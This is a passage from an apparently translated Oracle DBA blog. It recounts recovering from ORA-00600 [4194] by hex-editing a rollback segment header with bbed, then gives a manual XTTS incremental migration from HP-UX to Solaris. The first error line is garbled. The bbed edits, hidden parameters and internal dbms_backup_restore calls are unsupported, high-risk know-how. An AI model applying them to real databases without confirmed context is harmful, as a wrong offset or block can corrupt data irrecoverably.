Incident 864297 created, dump file: /opt/oracle/diag/rdbms/jddb/jddb/incident/incdir_864297/jddb_ora_49305_i864297.trc
ORA-00600: internal error code, arguments: [4194], [rch/1_1_942699661.dbfcceeded but OPEN RESETLOGS would get error below
ORA-01194: file 1 needs more recovery to be consistent
ORA-01110: data file 1: '/opt/oracle/oradata/jddb/system01.dbf
You can see that Oracle fails while executing the update of undo$, and the segment being updated is _SYSSMU1_3724004606$. The wait line also records exactly the file# 1 block 131 reported earlier. So would _corrupted_rollback_segments=(_SYSSMU1_3724004606$) solve the problem?
Unfortunately, in my tests it did not. Even using bbed to edit the kdbr rows of undo$ and flip _SYSSMU1 to offline status could not get past this ORA-00600 [4194].
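For reference, a minimal sketch of the pfile entries behind the two bypass attempts mentioned above (both are unsupported, last-resort settings, and neither worked in this case):

# entries added to the startup pfile for the bypass attempts (unsupported)
*.undo_management='MANUAL'
*._corrupted_rollback_segments=('_SYSSMU1_3724004606$')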
This must be the most stubborn ORA-00600 [4194] I have seen.
I went back over the earlier trace file and, from the dump of this rollback segment header, confirmed that it contains no active transactions.
Looking more carefully at our ORA-00600 [4194], something feels odd: according to the MOS note there should be [a] and [b] arguments, but here both are effectively 0 (missing).
In the end we decided to bypass the error by editing the SYSTEM rollback segment header directly. Here is the procedure:
BBED> p ktuxc
struct ktuxc, 104 bytes                     @4148
   struct ktuxcscn, 8 bytes                 @4148
      ub4 kscnbas                           @4148     0x70105e77
      ub2 kscnwrp                           @4152     0x0000
   struct ktuxcuba, 8 bytes                 @4156
      ub4 kubadba                           @4156     0x00400084
      ub2 kubaseq                           @4160     0x0024
      ub1 kubarec                           @4162     0x20
   sb2 ktuxcflg                             @4164     1 (KTUXCFSK)
   ub2 ktuxcseq                             @4166     0x0024
   sb2 ktuxcnfb                             @4168     1
   ub4 ktuxcinc                             @4172     0x00000000
   sb2 ktuxcchd                             @4176     63
   sb2 ktuxcctl                             @4178     56
   ub2 ktuxcmgc                             @4180     0x8002
   ub4 ktuxcopt                             @4188     0x7ffffffe
   struct ktuxcfbp[0], 12 bytes             @4192
      struct ktufbuba, 8 bytes              @4192
         ub4 kubadba                        @4192     0x00000000
         ub2 kubaseq                        @4196     0x0024
         ub1 kubarec                        @4198     0x1f
      sb2 ktufbext                          @4200     0
      sb2 ktufbspc                          @4202     656
   struct ktuxcfbp[1], 12 bytes             @4204
      struct ktufbuba, 8 bytes              @4204
         ub4 kubadba                        @4204     0x00400083
         ub2 kubaseq                        @4208     0x0024
         ub1 kubarec                        @4210     0x02
      sb2 ktufbext                          @4212     0
      sb2 ktufbspc                          @4214     7602
Note that only ktuxcnfb and ktuxcfbp[1] need to be changed: set ktuxcnfb to 0 and zero out the uba in ktuxcfbp[1].
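Roughly, the bbed session looks like the sketch below. The offsets 4168 (ktuxcnfb) and 4204 (the uba inside ktuxcfbp[1]) come from the print output above; the datafile, the block number of the SYSTEM rollback segment header and the byte widths are placeholders that must be verified against your own dump before changing anything:

BBED> set filename '/opt/oracle/oradata/jddb/system01.dbf'
BBED> set block <block# of the SYSTEM rollback segment header>
BBED> modify /x 0000 offset 4168          -- ktuxcnfb -> 0 (sb2, 2 bytes)
BBED> modify /x 00000000 offset 4204      -- ktuxcfbp[1] kubadba -> 0 (ub4, 4 bytes)
BBED> sum apply                           -- recompute and apply the block checksum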
Then we tried opening the database again, and this time it opened cleanly:
SQL> alter database open resetlogs;

Database altered.

SQL> show parameter job

NAME                                 TYPE        VALUE
------------------------------------ ----------- ------------------------------
job_queue_processes                  integer     1000
SQL> alter system set job_queue_processes=0;

System altered.
A check of the alert log afterwards showed no further ORA- errors.
By now you may be wondering how such a failure could happen at all, and I share the confusion. Why?
Because this database was shut down cleanly with shutdown immediate. As we all know, after that kind of shutdown every Oracle database file is in a consistent state, and no instance recovery should be needed on the next startup.
So why did this happen anyway?
I see two possibilities:
1. After shutdown immediate, the writes were still sitting in the OS cache and had not fully reached disk when the host was forcibly restarted;
   losing the OS cache left the database inconsistent (this environment uses a Linux filesystem).
2. Some other program or software damaged the consistency of the Oracle database files (as it turns out, Rose HA is deployed in this environment,
   and reportedly the customer did not stop Rose HA during the maintenance).
Since the customer's operation took place at 2 a.m., with essentially zero business activity, I consider the first possibility close to nil; the second is far more likely.
Of course, not knowing how Rose HA works internally, I will not comment further; suffice it to say this is a very strange case.
The consolation is that, with our efforts, the customer's system was brought back quickly and with no data loss.

Related posts:

  1. database crash with ora-00494
  2. 非归档恢复遭遇ORA-01190 和 ORA-600 [krhpfh_03-1202]–恢复小记
  3. Instance immediate crash after open
  4. Another one recover database case!
  5. 3TB 非归档Oracle数据库恢复小case(windows)

Migrating a database from HP-UX to Solaris SPARC with XTTS incremental backups


本站文章除注明转载外,均为本站原创: 转载自love wife & love life —Roger 的Oracle技术博客

本文链接地址: 使用XTTS增量进行HP Unix到Soalris Sparc的数据库迁移

Since I tested XTTS incremental U2L migration in early 2015, many people in China have adopted this approach for cross-platform database migration, mostly using the Perl scripts packaged by Oracle. The Oracle MOS note 11G – Reduce Transportable Tablespace Downtime using Cross Platform Incremental Backup (Doc ID 1389592.1) states explicitly that the destination must be Linux; here is the original wording from the note:

The source system may be any platform provided the prerequisites referenced and listed below for both platform and database are met. The destination system must be Linux, either 64-bit Oracle Linux or RedHat Linux, as long as it is a certified version. The typical use case is expected to be migrating data from a big endian platform, such as IBM AIX, HP-UX, or Solaris SPARC, to 64-bit Oracle Linux, such as Oracle Exadata Database Machine running Oracle Linux.

This is easy to misread: Oracle is not saying that other platforms are unsupported, only that the packaged Perl scripts do not support them. Doing the XTTS steps by hand works perfectly well, and my tests confirm it. Below is a test of XTTS incremental migration from HP-UX Itanium to Solaris SPARC, for reference.

1. First, create a test tablespace and test table on the source.

- Create the test tablespace:

create tablespace xtts datafile '+data' size 100m;

create table test0504 as select * from dba_objects where 1=2;

alter table test0504 move tablespace xtts;

2. Back up (copy out) the XTTS tablespace datafile and transfer it to the destination (Solaris).

Omitted here; a minimal RMAN sketch is given below.
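Since the source datafile lives in ASM, one way to produce the /tmp/xtts.dbf copy that step 3 converts is an RMAN image copy of the datafile (file number 941 is the one RMAN reports later in this post); transferring the copy to the Solaris host by scp/sftp is omitted:

RMAN> backup as copy datafile 941 format '/tmp/xtts.dbf';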

3. Convert the file format on the destination.

convert from platform 'HP-UX IA (64-bit)' datafile '/tmp/xtts.dbf' format '+DATA/test/datafile/xtts_new.dbf';

 

 

4. Take an SCN-based incremental backup on the source (block change tracking was not enabled here, since this is only a test tablespace).

$ rman target /

Recovery Manager: Release 11.2.0.3.0 - Production on Thu May 4 16:20:45 2017

Copyright (c) 1982, 2011, Oracle and/or its affiliates.  All rights reserved.

connected to target database: CQDB (DBID=1910815733)

RMAN> run {
set until scn=14528565277766;
allocate channel t1 type disk ;
backup incremental from scn 14528539218186 tablespace 'XTTS'  format '/tmp/xtts_incr1.bak';
release channel t1;
}2> 3> 4> 5> 6> 

executing command: SET until clause

using target database control file instead of recovery catalog
allocated channel: t1
channel t1: SID=3692 instance=cqdb3 device type=DISK

Starting backup at 04-MAY-2017 16:21:06

backup will be obsolete on date 11-MAY-2017 16:21:09
archived logs will not be kept or backed up
channel t1: starting full datafile backup set
channel t1: specifying datafile(s) in backup set
input datafile file number=00941 name=+DATA/cqdb/datafile/xtts.1277.943107855
channel t1: starting piece 1 at 04-MAY-2017 16:21:10
channel t1: finished piece 1 at 04-MAY-2017 16:21:17
piece handle=/tmp/xtts_incr1.bak tag=TAG20170504T162108 comment=NONE
channel t1: backup set complete, elapsed time: 00:00:07

backup will be obsolete on date 11-MAY-2017 16:21:18
archived logs will not be kept or backed up
channel t1: starting full datafile backup set
channel t1: specifying datafile(s) in backup set
including current control file in backup set
channel t1: starting piece 1 at 04-MAY-2017 16:21:26
released channel: t1

 

 

5. Transfer the backup set to the destination and convert its format manually (Solaris).

Save the following script as xtts_conv1.sql and run it; here is its content:

 DECLARE
   handle    varchar2(512);
   comment   varchar2(80);
   media     varchar2(80);
   concur    boolean;
   recid     number;
   stamp     number;
   pltfrmfr number;
   devtype   VARCHAR2(512);
 BEGIN
   BEGIN
     sys.dbms_backup_restore.restoreCancel(TRUE);
     devtype := sys.dbms_backup_restore.deviceAllocate;
     sys.dbms_backup_restore.backupBackupPiece(bpname => '/tmp/xtts_incr1.bak',fname => '/tmp/xtts_conv_incr1.bak',handle => handle,media=> media,comment=> comment, concur=> concur,recid=> recid,stamp => stamp, check_logical => FALSE,copyno=> 1, deffmt=> 0, copy_recid=> 0,copy_stamp => 0,npieces=> 1,dest=> 0,pltfrmfr=> 4);
   END;
 END;
 /

 

 

The result of the execution:

SQL> start xtts_conv1.sql;

PL/SQL procedure successfully completed.

 

 

6. Apply the first incremental backup (Solaris).

Note: to verify that incremental changes really make it to the destination, I ran the following on the source before taking the incremental backup:

SQL> insert into test0504 select * from dba_objects where rownum < 101;

SQL> commit;

Save the following script as apply_incr1.sql and run it:

set serveroutput on;
DECLARE
  outhandle varchar2(512);
  outtag    varchar2(30);
  done      boolean;
  failover  boolean;
  devtype   varchar2(512);
BEGIN
  DBMS_OUTPUT.put_line('Entering RollForward');
  -- Now the rolling forward.
  devtype := sys.dbms_backup_restore.deviceAllocate;
  sys.dbms_backup_restore.applySetDatafile(check_logical => FALSE, cleanup => FALSE);
  DBMS_OUTPUT.put_line('After applySetDataFile');
  sys.dbms_backup_restore.applyDatafileTo(
    dfnumber       => 941,
    toname         => '+DATA/test/datafile/xtts_new.dbf',
    fuzziness_hint => 0,
    max_corrupt    => 0,
    islevel0       => 0,
    recid          => 0,
    stamp          => 0);
  DBMS_OUTPUT.put_line('Done: applyDataFileTo');
  DBMS_OUTPUT.put_line('Done: applyDataFileTo');
  -- Restore Set Piece
  sys.dbms_backup_restore.restoreSetPiece(
    handle   => '/tmp/xtts_conv_incr1.bak',
    tag      => null,
    fromdisk => true,
    recid    => 0,
    stamp    => 0);
  DBMS_OUTPUT.put_line('Done: RestoreSetPiece');
  -- Restore Backup Piece
  sys.dbms_backup_restore.restoreBackupPiece(
    done      => done,
    params    => null,
    outhandle => outhandle,
    outtag    => outtag,
    failover  => failover);
  DBMS_OUTPUT.put_line('Done: RestoreBackupPiece');
  sys.dbms_backup_restore.restoreCancel(TRUE);
  sys.dbms_backup_restore.deviceDeallocate;
END;
/

The output is as follows:

SQL> @apply_incr1.sql
Entering RollForward
After applySetDataFile
Done: applyDataFileTo
Done: applyDataFileTo
Done: RestoreSetPiece
Done: RestoreBackupPiece

PL/SQL procedure successfully completed.
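The dfnumber (941) and toname used in apply_incr1.sql have to match your environment: toname is the converted copy created in step 3, and the file number comes from the source database. A quick way to check it on the source (not part of the original post):

SQL> select file_id, file_name from dba_data_files where tablespace_name = 'XTTS';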


7. Set the tablespace to read only on the source

SQL> alter tablespace xtts read only;
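While the tablespace is read only, it is also a good idea to confirm that the tablespace set is self-contained before the metadata export in step 11. This check is not in the original walkthrough, but DBMS_TTS makes it a one-liner:

SQL> exec dbms_tts.transport_set_check('XTTS', TRUE);
SQL> select * from transport_set_violations;

No rows from the second query means the tablespace can be transported.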

8. Take the final incremental backup

run {
allocate channel t1 type disk ;
backup incremental from scn 14528565277766 tablespace 'XTTS'  format '/tmp/xtts_incr2.bak';
release channel t1;
}


9. Transfer the backup set to the target and convert it

Steps omitted (same as above)

10. Apply the final incremental backup

Steps omitted (same as above)

11. Export the metadata on the source

Save the following as exp_xtts.par:

transport_tablespace=y
tablespaces=('XTTS')
file=xtts_tab.dmp
log=xtts_tab.log

Run the following command to export the metadata for the xtts tablespace:

$ exp \'/ as sysdba\' parfile=exp_xtts.par

Export: Release 11.2.0.3.0 - Production on Thu May 4 16:46:28 2017

Copyright (c) 1982, 2011, Oracle and/or its affiliates.  All rights reserved.

Connected to: Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production
With the Partitioning, Real Application Clusters, Automatic Storage Management, OLAP,
Data Mining and Real Application Testing options
Export done in ZHS16GBK character set and UTF8 NCHAR character set
Note: table data (rows) will not be exported
About to export transportable tablespace metadata...
For tablespace XTTS ...
. exporting cluster definitions
. exporting table definitions
. . exporting table                       TEST0504
. exporting referential integrity constraints
. exporting triggers
. end transportable tablespace metadata export
Export terminated successfully without warnings.
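For reference only (the original walkthrough uses classic exp/imp throughout), a Data Pump equivalent of this export would look roughly like the following; the parameter file name and directory are illustrative:

$ cat expdp_xtts.par
directory=DATA_PUMP_DIR
dumpfile=xtts_tab.dmp
logfile=xtts_exp.log
transport_tablespaces=XTTS
transport_full_check=y

$ expdp \'/ as sysdba\' parfile=expdp_xtts.par

The corresponding import would use impdp with the transport_datafiles parameter pointing at the converted datafile.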

12. Import the metadata on the target

Save the following as imp_xtts.par:

transport_tablespace=y
TABLESPACES=('XTTS')
file=xtts_tab.dmp
log=xtts_tab.log
datafiles=(
'+DATA/test/datafile/xtts_new.dbf')

Run the following command to import the metadata:

-bash-4.4$ imp \'/ as sysdba\' parfile=imp_xtts.par 

Import: Release 11.2.0.4.0 - Production on Thu May 4 17:47:27 2017

Copyright (c) 1982, 2011, Oracle and/or its affiliates.  All rights reserved.

Connected to: Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit Production
With the Partitioning, Real Application Clusters, Automatic Storage Management, OLAP,
Data Mining and Real Application Testing options

Export file created by EXPORT:V11.02.00 via conventional path
About to import transportable tablespace(s) metadata...
import done in US7ASCII character set and AL16UTF16 NCHAR character set
import server uses ZHS16GBK character set (possible charset conversion)
export client uses ZHS16GBK character set (possible charset conversion)
export server uses UTF8 NCHAR character set (possible ncharset conversion)
. importing SYS's objects into SYS
. importing SYS's objects into SYS
. . importing table                     "TEST0504"
Import terminated successfully without warnings.

13. Verify the data

-bash-4.4$ sqlplus "/as sysdba"

SQL*Plus: Release 11.2.0.4.0 Production on Thu May 4 17:47:35 2017

Copyright (c) 1982, 2013, Oracle.  All rights reserved.

Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit Production
With the Partitioning, Real Application Clusters, Automatic Storage Management, OLAP,
Data Mining and Real Application Testing options

SQL> select name from v$datafile;

NAME
--------------------------------------------------------------------------------
+DATA/test/datafile/system.657.943109907
+DATA/test/datafile/sysaux.656.943109911
+DATA/test/datafile/undotbs1.654.943109911
+DATA/test/datafile/users.653.943109927
+DATA/test/datafile/xtts_new.dbf

SQL> select count(1) from test0504;

  COUNT(1)
----------
       100

SQL> select PLATFORM_NAME from v$database;

PLATFORM_NAME
--------------------------------------------------------------------------------
Solaris[tm] OE (64-bit)

SQL> select tablespace_name,status from dba_tablespaces;

TABLESPACE_NAME                STATUS
------------------------------ ---------
SYSTEM                         ONLINE
SYSAUX                         ONLINE
UNDOTBS1                       ONLINE
TEMP                           ONLINE
USERS                          ONLINE
XTTS                           READ ONLY

As you can see, the xtts tablespace has been migrated over, and the incremental data has been synchronized as well.
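One last step that is not shown above: a transported tablespace arrives read only on the target, so once the verification looks good you would normally switch it back:

SQL> alter tablespace xtts read write;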

So the point I want to make is that any cross-platform migration can be done with the XTTS incremental backup approach, regardless of the target platform. Of course, when the endian formats are the same, you can also use the convert database feature directly.

Additional note:

When applying the incremental backup, an error like the following may appear:

ERROR at line 1:
ORA-19583: conversation terminated due to error
ORA-00600: internal error code, arguments: [2130], [941], [100], [4], [], [],
[], [], [], [], [], []
ORA-06512: at "SYS.DBMS_BACKUP_RESTORE", line 2335
ORA-06512: at line 13

If you hit this error, simply shut the instance down, start it in nomount state, and run the apply script there, as sketched below.
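A minimal sketch of that workaround, reusing the apply_incr1.sql script from step 6:

SQL> shutdown immediate
SQL> startup nomount
SQL> @apply_incr1.sql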
